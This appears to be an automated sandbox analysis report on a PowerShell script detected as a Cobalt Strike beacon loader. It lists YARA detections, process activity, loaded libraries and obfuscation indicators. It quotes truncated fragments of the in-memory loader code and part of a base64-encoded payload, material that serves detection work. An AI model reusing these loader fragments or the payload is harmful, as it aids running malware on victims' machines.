Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.evad.winPS1@2/5@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_0000022EFA0C0B70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0C867C TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_0000022EFA0C867C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5noeq2o4.gsw.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: 3.ps1 ReversingLabs: Detection: 73%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Z
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('bnlicXZrqsZros8DIyMja64+ydzc3Guq/Gui4PerIiPc8GKb05aBdUsnIyMjeWuq2tzzIyMjIyMjIyMjIyIjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyOmhQ4/4uRgbO
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_0000022EFA0D9744
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B4776C push 0000006Ah; retf 0_2_0000022EF9B47784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EF9B41F35 push rsp; iretw 0_2_0000022EF9B41F36
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E3935 push rsp; iretw 0_2_0000022EFA0E3936
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0E916C push 0000006Ah; retf 0_2_0000022EFA0E9184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B895B77 pushad ; iretd 0_2_00007FFD9B895BB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B89A26C push esp; retf 0_2_00007FFD9B89A26D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B9603E9 push cs; iretd 0_2_00007FFD9B96040A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B964FAD push ss; iretd 0_2_00007FFD9B9651F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B967F1D push ecx; iretd 0_2_00007FFD9B967F1E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B964218 push eax; ret 0_2_00007FFD9B964219
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B9679EA push esi; iretd 0_2_00007FFD9B9679EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B96158C push edi; ret 0_2_00007FFD9B961598
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B9654D0 push ds; iretd 0_2_00007FFD9B9654D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B967CAD push esp; iretd 0_2_00007FFD9B967CAE
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_0000022EFA0D01A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0000022EFA0D01A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
